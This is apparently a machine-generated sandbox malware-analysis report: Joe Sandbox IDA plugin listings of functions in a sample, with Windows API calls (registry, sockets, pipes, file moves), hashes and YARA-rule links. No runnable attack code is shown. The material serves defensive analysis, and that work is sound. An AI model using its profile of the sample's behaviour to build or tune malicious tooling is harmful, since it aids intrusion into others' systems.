                  • Part of subcall function 0017DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0017CF22,?), ref: 0017DE16
                • lstrcmpiW.KERNEL32(?,?), ref: 0017CF45
                • MoveFileW.KERNEL32(?,?), ref: 0017CF7F
                • _wcslen.LIBCMT ref: 0017D005
                • _wcslen.LIBCMT ref: 0017D01B
                • SHFileOperationW.SHELL32(?), ref: 0017D061
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                • String ID: \*.*
                • API String ID: 3164238972-1173974218
                • Opcode ID: 1c049c5e408eba1b76780d485f53f279abee5f3eb318e7d453406079108ac77b
                • Instruction ID: 205c37d5ba797f7de024d68b442363ab3bbb045c6ed7bc74f2b2e694d6250326
                • Opcode Fuzzy Hash: 1c049c5e408eba1b76780d485f53f279abee5f3eb318e7d453406079108ac77b
                • Instruction Fuzzy Hash: 294114719452189FDF16EBA4D981BDEB7F9AF19380F1040EAE509EB141EB34A788CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001A2E1C
                • GetWindowLongW.USER32(00000000,000000F0), ref: 001A2E4F
                • GetWindowLongW.USER32(00000000,000000F0), ref: 001A2E84
                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 001A2EB6
                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 001A2EE0
                • GetWindowLongW.USER32(00000000,000000F0), ref: 001A2EF1
                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001A2F0B
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: LongWindow$MessageSend
                • String ID:
                • API String ID: 2178440468-0
                • Opcode ID: f9093a39de399376b47f4b7302d5735c77ae76f396be978cba532c0bcd3a9598
                • Instruction ID: d032bc4bb0a4de08083ce842f904e65e413916ef3a9ccfc2f9600d526306efe3
                • Opcode Fuzzy Hash: f9093a39de399376b47f4b7302d5735c77ae76f396be978cba532c0bcd3a9598
                • Instruction Fuzzy Hash: 8331D239645290AFDB21CF5CDC84FA937E5EB9AB14F150164F905CF6B2CB71A880DB81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00177726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                Download Yara Rule
                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00177769
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0017778F
                • SysAllocString.OLEAUT32(00000000), ref: 00177792
                • SysAllocString.OLEAUT32(?), ref: 001777B0
                • SysFreeString.OLEAUT32(?), ref: 001777B9
                • StringFromGUID2.OLE32(?,?,00000028), ref: 001777DE
                • SysAllocString.OLEAUT32(?), ref: 001777EC
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                • String ID:
                • API String ID: 3761583154-0
                • Opcode ID: c69b2c51e9eae1571c04217b4710392009897acc9efe19d9463bb581b00f7b50
                • Instruction ID: a20fca3d3d2c965ac8eec4bdcd23669a79a444691dbef73640fdaa43b05155bc
                • Opcode Fuzzy Hash: c69b2c51e9eae1571c04217b4710392009897acc9efe19d9463bb581b00f7b50
                • Instruction Fuzzy Hash: 1D21B076604219AFDB14EFA8DC88CBB77FCEB09364B018425FA08DB190D770DC8287A4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001777FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                Download Yara Rule
                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00177842
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00177868
                • SysAllocString.OLEAUT32(00000000), ref: 0017786B
                • SysAllocString.OLEAUT32 ref: 0017788C
                • SysFreeString.OLEAUT32 ref: 00177895
                • StringFromGUID2.OLE32(?,?,00000028), ref: 001778AF
                • SysAllocString.OLEAUT32(?), ref: 001778BD
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                • String ID:
                • API String ID: 3761583154-0
                • Opcode ID: 27ca6e9b3a07ce91a11b36819826347b5f7dd7e378229adc5d0f2221e54395af
                • Instruction ID: 21c074539f82e75dbc8bf20efedb969f2d276fa97a6fec49aa2132da9263d91b
                • Opcode Fuzzy Hash: 27ca6e9b3a07ce91a11b36819826347b5f7dd7e378229adc5d0f2221e54395af
                • Instruction Fuzzy Hash: 85213035608214AFDB109FA8DC88DBA77FCEB09760B118125F919CB2A1DB74DC81CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001804D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                Download Yara Rule
                APIs
                • GetStdHandle.KERNEL32(0000000C), ref: 001804F2
                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0018052E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateHandlePipe
                • String ID: nul
                • API String ID: 1424370930-2873401336
                • Opcode ID: 3dfcdd8bf3f2b24e0af61f07ebb2dc6b98e652b17a414d07cb3653997bb19d4f
                • Instruction ID: 69a7bb9e94b966ca8ef7f1ad1a965a4df647cbc9771cd256a9e51ae812ae7c65
                • Opcode Fuzzy Hash: 3dfcdd8bf3f2b24e0af61f07ebb2dc6b98e652b17a414d07cb3653997bb19d4f
                • Instruction Fuzzy Hash: 39216075600309AFDB61AF29DC44A9A77E4BF49724F204A19F8A1D72E0D7709A88CF70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001805A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                Download Yara Rule
                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 001805C6
                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00180601
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateHandlePipe
                • String ID: nul
                • API String ID: 1424370930-2873401336
                • Opcode ID: bd983462b29915c1ac3cb5172eac69314574ce37a5fd77eb73db0dcc7609d84e
                • Instruction ID: 69ec9b2c9903fcab6717b12a8eef98ee36b25a24d4a997dbf65e140012a05381
                • Opcode Fuzzy Hash: bd983462b29915c1ac3cb5172eac69314574ce37a5fd77eb73db0dcc7609d84e
                • Instruction Fuzzy Hash: 732183755003099FDB61AF698C04A5A77E4BF99720F304B19F8A1E72E0E7709A64CF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0011600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0011604C
                  • Part of subcall function 0011600E: GetStockObject.GDI32(00000011), ref: 00116060
                  • Part of subcall function 0011600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0011606A
                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001A4112
                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001A411F
                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001A412A
                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001A4139
                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001A4145
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$CreateObjectStockWindow
                • String ID: Msctls_Progress32
                • API String ID: 1025951953-3636473452
                • Opcode ID: 7aff2b4606bab9cd4007726e0e09de9c756c0f3d08e0cd877b11dff8e3cd830c
                • Instruction ID: 30d779cdbc5f2009bdedd58b104b076d3b4c9fcf7e33fca18527f7c7a13af2c7
                • Opcode Fuzzy Hash: 7aff2b4606bab9cd4007726e0e09de9c756c0f3d08e0cd877b11dff8e3cd830c
                • Instruction Fuzzy Hash: 4211E2B6140219BFEF108F64CC81EE77F9DEF09398F004110BA18A2190CBB29C61DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0014D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 0014D7A3: _free.LIBCMT ref: 0014D7CC
                • _free.LIBCMT ref: 0014D82D
                  • Part of subcall function 001429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000), ref: 001429DE
                  • Part of subcall function 001429C8: GetLastError.KERNEL32(00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000,00000000), ref: 001429F0
                • _free.LIBCMT ref: 0014D838
                • _free.LIBCMT ref: 0014D843
                • _free.LIBCMT ref: 0014D897
                • _free.LIBCMT ref: 0014D8A2
                • _free.LIBCMT ref: 0014D8AD
                • _free.LIBCMT ref: 0014D8B8
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                • Instruction ID: 7b77029a6bf6f8145233abb249f73d26166b24d4bb220203e93a948785e7011c
                • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                • Instruction Fuzzy Hash: C2115971540B14AAEE21BFF0DC06FCB7B9CAF20705F800825F299A62A2DB34A5458661
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0017DA74
                • LoadStringW.USER32(00000000), ref: 0017DA7B
                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0017DA91
                • LoadStringW.USER32(00000000), ref: 0017DA98
                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0017DADC
                Strings
                • %s (%d) : ==> %s: %s %s, xrefs: 0017DAB9
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: HandleLoadModuleString$Message
                • String ID: %s (%d) : ==> %s: %s %s
                • API String ID: 4072794657-3128320259
                • Opcode ID: 9bc1a8fb54d960aad58d1fa6ae16a677a4ba354d3b3d7346642a455bee6dd0cb
                • Instruction ID: 3e6c5b9d6dcf83803608620120f81adb4a1f388e6e6b2dd96b43e8738f1809d1
                • Opcode Fuzzy Hash: 9bc1a8fb54d960aad58d1fa6ae16a677a4ba354d3b3d7346642a455bee6dd0cb
                • Instruction Fuzzy Hash: FF014FF6500208BBE7109BA09D89EE6327CEB09301F404496B70AE2141EA749E848BB4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                Download Yara Rule
                APIs
                • InterlockedExchange.KERNEL32(00DDEC00,00DDEC00), ref: 0018097B
                • EnterCriticalSection.KERNEL32(00DDEBE0,00000000), ref: 0018098D
                • TerminateThread.KERNEL32(72446D65,000001F6), ref: 0018099B
                • WaitForSingleObject.KERNEL32(72446D65,000003E8), ref: 001809A9
                • CloseHandle.KERNEL32(72446D65), ref: 001809B8
                • InterlockedExchange.KERNEL32(00DDEC00,000001F6), ref: 001809C8
                • LeaveCriticalSection.KERNEL32(00DDEBE0), ref: 001809CF
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                • String ID:
                • API String ID: 3495660284-0
                • Opcode ID: 4f969ffd15741bf1edeb45a364da9a5ffd320a9340665e68b6a3fe634e639184
                • Instruction ID: 31227f83e9721766ab74e05fdf297ef891ae64b74924de42ce0fb1ea3f5a8b83
                • Opcode Fuzzy Hash: 4f969ffd15741bf1edeb45a364da9a5ffd320a9340665e68b6a3fe634e639184
                • Instruction Fuzzy Hash: 5DF0C932542A12BBD7525BA4EE89BD6BA29FF06706F402026F20290CA1DB7595A5CFD0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00191C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                Download Yara Rule
                APIs
                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00191DC0
                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00191DE1
                • WSAGetLastError.WSOCK32 ref: 00191DF2
                • htons.WSOCK32(?,?,?,?,?), ref: 00191EDB
                • inet_ntoa.WSOCK32(?), ref: 00191E8C
                  • Part of subcall function 001739E8: _strlen.LIBCMT ref: 001739F2
                  • Part of subcall function 00193224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0018EC0C), ref: 00193240
                • _strlen.LIBCMT ref: 00191F35
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                • String ID:
                • API String ID: 3203458085-0
                • Opcode ID: 5323cdca9fdf83392149a3932f154bfe985e91d18b13ab7119cd51232087c38b
                • Instruction ID: 5c25465bb2be95ba49b905f916eb347053911be5593915774cd8efc09f9c60b8
                • Opcode Fuzzy Hash: 5323cdca9fdf83392149a3932f154bfe985e91d18b13ab7119cd51232087c38b
                • Instruction Fuzzy Hash: 07B12431204341AFCB28DF24C885E6A7BE5AF94318F54895CF45A4F2E2DB31ED86CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00115D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                Download Yara Rule
                APIs
                • GetClientRect.USER32(?,?), ref: 00115D30
                • GetWindowRect.USER32(?,?), ref: 00115D71
                • ScreenToClient.USER32(?,?), ref: 00115D99
                • GetClientRect.USER32(?,?), ref: 00115ED7
                • GetWindowRect.USER32(?,?), ref: 00115EF8
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Rect$Client$Window$Screen
                • String ID:
                • API String ID: 1296646539-0
                • Opcode ID: 7c9cef0011cdb8b0d7841942820feecc0608f22b197847c6cf2b177d6afa8ce6
                • Instruction ID: 4cf01a5e534c3865c5efd0d1e0a3015fd45cbb4f61cfa5774f4ffd44b6d66dcb
                • Opcode Fuzzy Hash: 7c9cef0011cdb8b0d7841942820feecc0608f22b197847c6cf2b177d6afa8ce6
                • Instruction Fuzzy Hash: 82B16B34A0064ADFDB18CFA9C4407EEB7F2FF58314F14941AE8A9D7250D730AA95DB54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001401B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                Download Yara Rule
                APIs
                • __allrem.LIBCMT ref: 001400BA
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001400D6
                • __allrem.LIBCMT ref: 001400ED
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0014010B
                • __allrem.LIBCMT ref: 00140122
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00140140
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                • String ID:
                • API String ID: 1992179935-0
                • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                • Instruction ID: a36c617439597aeb9afab3a1322d50b8ea02d215b85d4236b815fb19d50b0364
                • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                • Instruction Fuzzy Hash: F7814972A00706ABE725AF39CC81B6B73E8AF65764F24453EF911D72A1E770D9018B50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001461FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                Download Yara Rule
                APIs
                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001382D9,001382D9,?,?,?,0014644F,00000001,00000001,8BE85006), ref: 00146258
                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0014644F,00000001,00000001,8BE85006,?,?,?), ref: 001462DE
                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001463D8
                • __freea.LIBCMT ref: 001463E5
                  • Part of subcall function 00143820: RtlAllocateHeap.NTDLL(00000000,?,001E1444,?,0012FDF5,?,?,0011A976,00000010,001E1440,001113FC,?,001113C6,?,00111129), ref: 00143852
                • __freea.LIBCMT ref: 001463EE
                • __freea.LIBCMT ref: 00146413
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ByteCharMultiWide__freea$AllocateHeap
                • String ID:
                • API String ID: 1414292761-0
                • Opcode ID: 8c888e71930dccbc225c87bb27c1a0caaae2d1a3f688642e870fb086595bbce5
                • Instruction ID: 37665ff02aa91fc563ccb0a696b20f1045bb363bc50c964a8b796536ccf3ab12
                • Opcode Fuzzy Hash: 8c888e71930dccbc225c87bb27c1a0caaae2d1a3f688642e870fb086595bbce5
                • Instruction Fuzzy Hash: 8B51F372A00256ABDB258F64CC81EAF77A9FF56728F154629FC09D71A0DB34DC80C6A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 0019C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0019B6AE,?,?), ref: 0019C9B5
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019C9F1
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019CA68
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019CA9E
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0019BCCA
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0019BD25
                • RegCloseKey.ADVAPI32(00000000), ref: 0019BD6A
                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0019BD99
                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0019BDF3
                • RegCloseKey.ADVAPI32(?), ref: 0019BDFF
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                • String ID:
                • API String ID: 1120388591-0
